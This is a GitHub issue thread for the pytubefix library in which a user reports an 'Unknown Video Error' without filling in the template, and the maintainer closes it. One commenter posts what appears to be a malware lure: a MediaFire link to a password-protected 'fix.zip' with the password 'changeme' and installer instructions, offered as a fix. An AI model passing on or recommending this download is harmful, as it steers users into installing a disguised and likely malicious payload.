### ISSUE TITLE
Unknown Video Error

### ISSUE THREAD

**Issue by ejouanne** [JuanBindez/pytubefix#200]
**:exclamation:  DO NOT REMOVE OR SKIP THE ISSUE TEMPLATE :exclamation:**

lack of information will lead to closure of the issue

__________
**Describe the bug**
Unknown Video Error
Video ID: fcTm9D69Euo
Status: OK
Reason: We're experiencing technical difficulties.
Developer Message: Unknown video status
Please open an issue at https://github.com/JuanBindez/pytubefix/issues and provide the above log output.
Une erreur s'est produite : fcTm9D69Euo has an unknown error, check logs for more info
__________
**code that was used that resulted in the bug**

```python
from pytubefix import YouTube

# put your code here

```

__________
**Expected behavior**

__________
**Screenshots**

__________
**Desktop (please complete the following information):**
 - OS: [Your Operating System and Version]
 - Python Version [x.y.z]
 - Pytubefix Version [x.y.z]

__________
**Additional context**

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by JuanBindez** [comment]
due to lack of information this will be closed
